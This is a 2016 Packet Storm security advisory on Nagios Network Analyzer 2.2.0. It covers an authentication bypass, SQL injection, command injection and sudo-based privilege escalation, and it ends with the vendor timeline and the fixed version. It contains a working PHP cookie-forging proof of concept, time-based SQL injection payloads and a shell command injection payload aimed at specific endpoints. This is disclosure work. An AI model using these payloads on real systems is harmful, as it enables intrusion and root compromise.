Lucene search

packetstormFrancesco OddoPACKETSTORM:138327
HistoryAug 13, 2016 - 12:00 a.m.

Nagios Network Analyzer 2.2.0 Command Injection / SQL Injection

Francesco Oddo
`( , ) (,  
. '.' ) ('. ',  
). , ('. ( ) (  
(_,) .'), ) _ _,  
/ _____/ / _ \ ____ ____ _____  
\____ \==/ /_\ \ _/ ___\/ _ \ / \  
/ \/ | \\ \__( <_> ) Y Y \  
/______ /\___|__ / \___ >____/|__|_| /  
\/ \/.-. \/ \/:wq  
Nagios Network Analyzer Multiple Vulnerabilities  
Affected versions: Nagios Network Analyzer <= 2.2.0  
The Nagios Network Analyzer application is affected by multiple security  
vulnerabilities, including authentication bypass, SQL injection,  
arbitrary code execution via command injection and privilege escalation.  
These vulnerabilities can be chained together to obtain unauthenticated  
remote code execution in the context of the root user.  
==Authentication Bypass==  
Authentication for the Nagios Network Analyzer web management interface  
can be bypassed due to an insecure implementation of the function  
validating session cookies within the aSession.phpa file. As shown  
below, the application uses a base64 encoded serialized PHP string along  
with a SHA1 HMAC checksum as the cookie to authenticate and manage user  
sessions. A sample cookie format is shown below:  
s:10:"user_agent";s:72:"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0)  
Gecko/20100101 Firefox/46.0";s:13:"last_activity";  
s:30:"[email protected]";s:7:"user_id";s:1:"1";s:14:"old_last_login";s:10:"1463163525";s:9:"apiaccess";  
The application relies on the validation against the SHA1 HMAC to  
recognize and destroy invalid session cookies when the checksum value  
does not match. However the encryption key used to generate the HMAC  
checksum is statically set to the SHA1 hash value of the  
$_SERVER['HTTP_HOST'] PHP variable, which is the Host HTTP header value.  
This information can be controlled by the attacker and as such should  
not be considered a secure randomly generated value for the secret  
encryption key.  
Since no further verification is performed for other non-predictable  
fields (e.g. session_id, apikey, email, username etc.) and only a valid  
user agent string matching the correct HTTP header value is required, an  
attacker can forge arbitrary session cookies and bypass authentication.  
The script on the following page generates session cookies which are  
accepted and validated successfully by the application. A auser_ida  
value of 1 can be used to initiate a session in the context of the admin  
[POC - nagiosna_forge_cookie.php]  
// Usage: php nagiosna_forge_cookie.php [TARGET_IP_ADDRESS/DOMAIN NAME]  
$host = $argv[1];  
$session =  
s:15:"";s:10:"user_agent";s:72:"Mozilla/5.0 (Windows NT  
6.3; WOW64; rv:46.0) Gecko/20100101  
s:4:"XXXX";s:5:"email";s:16:"[email protected]";s:7:"user_id";s:1:"1";s:14:"old_last_login";s:10:"XXXXXXXXXX";  
$encryption_key = sha1($host);  
$hmac_check = hash_hmac('sha1', $session, $encryption_key);  
$cookie = $session . $hmac_check;  
echo urlencode($cookie);  
This vulnerability is present across multiple Nagios products.  
==SQL Injection==  
Multiple SQL injection vulnerabilities exist in the application web  
management interface. An attacker can exploit this vulnerabilities to  
retrieve sensitive data from the application MySQL database.  
URL =>  
Method => GET  
Parameter => o[col]  
POC Payload => name AND (SELECT * FROM (SELECT(SLEEP(5)))UtTW)  
URL =>  
Method => GET  
Parameter => o[col]  
POC Payload => name AND (SELECT * FROM (SELECT(SLEEP(5)))UtTW)  
URL => /nagiosna/index.php/admin/globals  
Method => POST  
Parameter => timezone  
POC Payload => US/Eastern%' AND (SELECT 4646 FROM(SELECT  
CHAR),0x20)),1,54) FROM nagiosna_users WHERE id=1 LIMIT  
GROUP BY x)a) AND '%'=''  
==Command Injection==  
A command injection vulnerability exists in the function generating PDF  
reports for download. Base64 encoded user-supplied input is passed as an  
argument to system shell calls without being escaped. An attacker can  
inject arbitrary shell commands and obtain remote code execution in the  
context of the apache user.  
URL => /nagiosna/index.php/download/report/sourcegroup/<ID>/<BASE64  
Method => GET  
POC Payload => q[rid]=5&q[gid]=1" "";{touch,/tmp/TESTFILE};echo "  
URL => /nagiosna/index.php/download/report/source/<ID>/<BASE64 ENCODED  
Method => GET  
POC Payload => q[rid]=5&q[gid]=1" "";{touch,/tmp/TESTFILE};echo "  
Arbitrary code execution in the context of the annaa user can also be  
obtained by abusing the intended functionality to define custom alert  
commands. As shown in the next section, this exposes the application to  
additional privilege escalation attack vectors.  
==Privilege Escalation==  
The default application sudoers configuration allows the aapachea and  
annaa users to run multiple Bash and Python scripts as root without  
being prompted for a password. The 'apache' user is in the 'nnacmd'  
group, which has insecure write permissions to multiple script files. An  
attacker can overwrite their contents with a malicious payload (i.e.  
spawn a shell) and escalate privileges to root.  
The script files with insecure permissions are listed below:  
PATH => /usr/local/nagiosna/bin/  
PERMISSIONS => rwxrwxr-t nna nnacmd  
PATH => /usr/local/nagiosna/scripts/  
PERMISSIONS => rwsrwsr-t nna nnacmd  
PATH => /usr/local/nagiosna/scripts/  
PERMISSIONS => rwsrwsr-t nna nnacmd  
| Solution |  
Upgrade to Nagios Network Analyzer 2.2.2.  
| Timeline |  
2/06/2016 a Initial disclosure to vendor  
3/06/2016 a Vendor acknowledges receipt of advisory  
3/06/2016 a Vendor releases new software build (2.2.1)  
8/07/2016 a Inform vendor about insecure fix (generation of encryption  
key based on epoch)  
9/07/2016 a Vendor confirms issue and replies with new fix  
01/08/2016 a Vendor releases patched software version  
11/08/2016 a Public disclosure  
| Additional |  
Further information is available in the accompanying PDF.